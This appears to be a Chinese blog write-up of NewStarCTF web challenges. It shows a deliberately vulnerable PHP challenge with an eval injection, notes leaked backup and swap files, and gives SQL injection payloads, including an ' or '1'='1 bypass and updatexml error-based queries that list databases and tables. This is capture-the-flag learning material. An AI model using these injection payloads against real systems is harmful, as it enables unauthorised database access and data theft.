NewStarCTF 公开赛赛道

HTTP

跟着提示一步一步走。
在这里插入图片描述

Head?Header!

同样是跟着提示。
在这里插入图片描述

NotPHP

<?php
error_reporting(0);
highlight_file(__FILE__);
if(file_get_contents($_GET['data']) == "Welcome to CTF"){
   
   
    if(md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2']){
   
   
        if(!is_numeric($_POST['num']) && intval($_POST['num']) == 2077){
   
   
            echo "Hack Me";
            eval("#".$_GET['cmd']);
        }else{
   
   
            die("Number error!");
        }
    }else{
   
   
        die("Wrong Key!");
    }
}else{
   
   
    die("Pass it!");
}

在这里插入图片描述

我真的会谢

robots.txt
在这里插入图片描述
在主页源码中已经提示vim出错,所以在.index.php.swp
在这里插入图片描述
最后一个在www.zip中
在这里插入图片描述

Word-For-You

' or '1'='1
在这里插入图片描述

Word-For-You(2 Gen)

测试后发现会报错,尝试报错注入成功。

爆库information_schema,mysql,performance_schema,wfy:
name='and+updatexml(1,substr(concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata)),0x7e),40,20),1)#


爆表wfy_admin,wfy_comments,wfy_info:
name='and+updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema="wfy")),0x7e)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值